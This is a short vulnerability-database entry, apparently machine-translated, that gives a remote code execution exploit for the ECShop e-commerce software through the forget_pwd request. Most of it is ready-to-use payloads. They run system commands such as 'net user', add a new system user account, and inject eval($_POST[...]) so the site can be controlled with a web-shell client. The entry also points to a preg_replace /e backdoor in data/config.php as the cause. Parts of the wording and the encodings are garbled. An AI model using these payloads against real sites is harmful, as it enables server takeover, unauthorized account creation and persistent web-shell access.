ecshop remote code execution vulnerability exp-vulnerability warning-the black bar safety net

2012-08-12T00:00:00
ID MYHACK58:62201234590
Type myhack58
Reporter 佚名
Modified 2012-08-12T00:00:00

Description

ecshop version ominous seems 0 9

system permissions

act=forget_pwd&action=get_pwd&email=${@print(system('net user'))}&user_name=furybijj

No fruit

To remove the system after the change%6 0

act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%6 0)%7D&user_name=furybijj

Decisive success

In fact, this also can be directly used chopper connect.

In the configuration write to:

www.xxxx.com

<O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>

The main use of the code is as follows:

act=forget_pwd&action=get_pwd&email=%2 4%7b%40print%2 8%60net%20user%6 0% 2 9%7d&user_name=furybijj

act=forget_pwd&action=get_pwd&email=%2 4%7b%40eval%2 8%24_POST%5bfuck%5d%2 9%7d&user_name=furybijj

The vulnerability of the reason is

data/config.php

define('EC_CHARSET','utf-8');

@preg_replace("/[email]/e",$_POST['email'],"error");